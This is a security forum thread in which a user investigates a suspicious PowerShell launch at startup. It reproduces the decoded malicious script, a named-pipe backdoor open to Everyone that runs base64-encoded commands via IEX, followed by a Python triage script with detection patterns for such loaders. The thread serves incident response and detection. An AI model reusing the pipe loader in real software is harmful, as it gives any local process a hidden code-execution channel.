NotAdmin
Posts: 4
Posts posted by NotAdmin
Apologies if I was not clear; I'll try to explain the point better.
I received an alert of suspicious PowerShell execution at a certain time, and the related obfuscated command was retrieved by the antimalware (in other words, I know what was executed, but I have to understand why). So, after analysis, I saw that PowerShell was triggered by cmd.exe, but no other parent processes were found because this happened at system startup, and I do not have other elements to continue the investigation (I'm thinking that something in autoexec has been compromised).
In the meantime, I tried to deobfuscate the PowerShell script (base64 encoded) and I finally obtained the attached commands.
At the moment I know what, when, who, where, how... I need to understand why! :)
-
Hi itman,
I tried to locate the script, but PowerShell came from cmd.exe (we are talking about a Win7 environment) and no other parent processes were found.
This process (cmd.exe, which executes powershell.exe) was triggered 5-6 times at system startup, without any particular "pattern" (it seems a random process): just to say, PowerShell execution was detected on Monday, then another event 4 days later, another after 7, and so on.
The Event Viewer didn't record any particular event in these specific timeframes.
N.B.: the PowerShell script was obfuscated; I decoded it and what I pasted is the clear-text command.
Many many thanks!
-
Hi all,
I've detected an attempt to execute a PowerShell command on a machine and, after decoding it, I retrieved these commands:
```powershell
# Names of the two pipes used by the exchange (random-looking strings)
$pn = "awkywlhbod"
$pm = "xnopgdzmw6"
# Script block run as a background job: it acts as the pipe server
$sb =
{
param ($pn, $pm)
add-Type -assembly "System.Core"
# Pipe ACL: any local account ("Everyone") may read and write the pipe
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$ps.AddAccessRule($ar)
# Input pipe: block until a client connects, then read a single line
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$p.WaitForConnection();
$pr = new-object System.IO.StreamReader($p)
$o = $pr.ReadLine()
$p.Dispose();
$pr.Dispose();
# The line is base64-encoded (UTF-8) PowerShell: decode it and run it with IEX
$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string
$o = IEX $s |out-string
# Output pipe: same open ACL; wait for a client and write back whatever IEX produced
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$ps.AddAccessRule($ar)
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$p.WaitForConnection();
$pw = new-object System.IO.StreamWriter($p)
$pw.AutoFlush = $true
$pw.WriteLine($o);
$p.Dispose();
}
add-Type -assembly "System.Core"
# Start the server in a job; the client handles below are created but never
# connected here, so the peer that feeds the input pipe is some other process
$t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)
$pl = new-object System.IO.Pipes.NamedPipeClientStream(".", $pn);
$pp = new-object System.IO.Pipes.NamedPipeClientStream(".", $pm);
# Idle for 10 minutes, then stop the job
Start-Sleep 600
$t.StopJob()
```
Is there anyone who can help me understand what this stands for?
Thank you very much in advance!!
Powershell code analysis - is this stuff safe? (in Malware Finding and Cleaning)
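As an added triage example (not code from the poster, from the forum, or from any vendor tool), the following Python covers the two steps that matter in a case like this one: decoding a base64 PowerShell payload (an -EncodedCommand blob is UTF-16LE inside base64, unlike the UTF-8 payload the pipe server above decodes), then pulling the named-pipe names and the risky behaviours out of the decoded text; the same check is applied to process-creation records so that launches by cmd.exe carrying an encoded command can be picked out of a log. The loader excerpt, the log lines, the field layout (a simplified Sysmon-style key=value form, not any product's real format) and the indicator patterns are all constructed for the example.

```python
import base64
import re

# Constructed sample: the pipe-related lines of the decoded script from the post
# (an excerpt, not the full script), later wrapped the way -EncodedCommand
# expects it: UTF-16LE text, then base64.
LOADER_SNIPPET = r'''$pn = "awkywlhbod"
$pm = "xnopgdzmw6"
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string
$o = IEX $s |out-string
$pl = new-object System.IO.Pipes.NamedPipeClientStream(".", $pn);
$pp = new-object System.IO.Pipes.NamedPipeClientStream(".", $pm);
Start-Sleep 600
'''

def encode_command(script: str) -> str:
    """Build an -EncodedCommand value (UTF-16LE, then base64); used for the sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_command(blob: str) -> str:
    """Decode a base64 PowerShell payload.

    -EncodedCommand blobs are UTF-16LE, so for ASCII script every odd byte is
    NUL.  The inner payload this loader reads from its pipe is UTF-8 instead,
    so fall back to UTF-8 when that NUL pattern is absent.
    """
    raw = base64.b64decode(blob)
    if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le")
    return raw.decode("utf-8", errors="replace")

# Behaviours worth flagging in a decoded script (heuristic patterns chosen for
# this example), each with the reason an analyst would write in the ticket.
INDICATORS = {
    "named_pipe_server": (r"NamedPipeServerStream", "hosts a named pipe and waits for a peer"),
    "everyone_acl": (r'PipeAccessRule\(\s*"Everyone"', "pipe ACL lets any local account connect"),
    "base64_payload": (r"FromBase64String", "decodes a second stage at run time"),
    "invoke_expression": (r"\bIEX\b|Invoke-Expression", "executes received text as code"),
    "long_sleep": (r"Start-Sleep\s+\d{3,}", "idles for minutes, waiting for a peer to feed it"),
}

def triage_script(script: str) -> dict:
    """Return {indicator: reason} for every indicator present in the script."""
    return {name: why for name, (pattern, why) in INDICATORS.items()
            if re.search(pattern, script, re.IGNORECASE)}

def extract_pipe_names(script: str) -> list:
    """Resolve the variables passed to NamedPipe*Stream to their string values."""
    assignments = dict(re.findall(r'\$(\w+)\s*=\s*"([^"]+)"', script))
    used = re.findall(r'NamedPipe(?:Server|Client)Stream\(\s*(?:"\."\s*,\s*)?\$(\w+)', script)
    return sorted({assignments.get(var, "$" + var) for var in used})

# Constructed process-creation records in a simplified Sysmon-style key=value
# layout; the first one carries the encoded loader, the others are benign noise.
SAMPLE_EVENTS = [
    "UtcTime=2019-03-04 07:01:12 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=powershell.exe -nop -w hidden -enc " + encode_command(LOADER_SNIPPET),
    "UtcTime=2019-03-04 07:02:40 Image=C:\\Windows\\System32\\notepad.exe "
    "ParentImage=C:\\Windows\\explorer.exe CommandLine=notepad.exe",
    "UtcTime=2019-03-04 09:15:03 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "ParentImage=C:\\Windows\\explorer.exe CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
]

FIELDS = ("UtcTime", "Image", "ParentImage", "CommandLine")
FIELD_RE = re.compile(r"(%s)=(.*?)(?= (?:%s)=|$)" % ("|".join(FIELDS), "|".join(FIELDS)))
# Accept the common short forms of -EncodedCommand and capture the blob after it.
ENCODED_FLAG = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)

def find_encoded_powershell(events: list) -> list:
    """Return (time, parent image, decoded command) for every powershell.exe
    launch that carries an encoded command.  The parent is kept because it is
    the pivot for finding the autostart entry (cmd.exe in the poster's case)."""
    hits = []
    for line in events:
        fields = dict(FIELD_RE.findall(line))
        if not fields.get("Image", "").lower().endswith("powershell.exe"):
            continue
        match = ENCODED_FLAG.search(fields.get("CommandLine", ""))
        if match:
            hits.append((fields["UtcTime"], fields["ParentImage"], decode_command(match.group(1))))
    return hits

if __name__ == "__main__":
    for when, parent, script in find_encoded_powershell(SAMPLE_EVENTS):
        print(f"{when}: encoded PowerShell spawned by {parent}")
        print("  pipes:", extract_pipe_names(script))
        for name, why in triage_script(script).items():
            print(f"  {name}: {why}")
```

Run it as a script and the single hit comes out with its parent process, both pipe names and all five indicators. In a real investigation the parent (cmd.exe here) is the thing to chase: the command line of that cmd.exe, not of powershell.exe, is what points at the autostart entry, and the pipe names are what to look for in a live process's open handles while the loader sits in its ten-minute sleep.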
Yes, I already used Autoruns to check for rubbish running at startup, but I didn't find any suspicious activity/process.
It's really strange...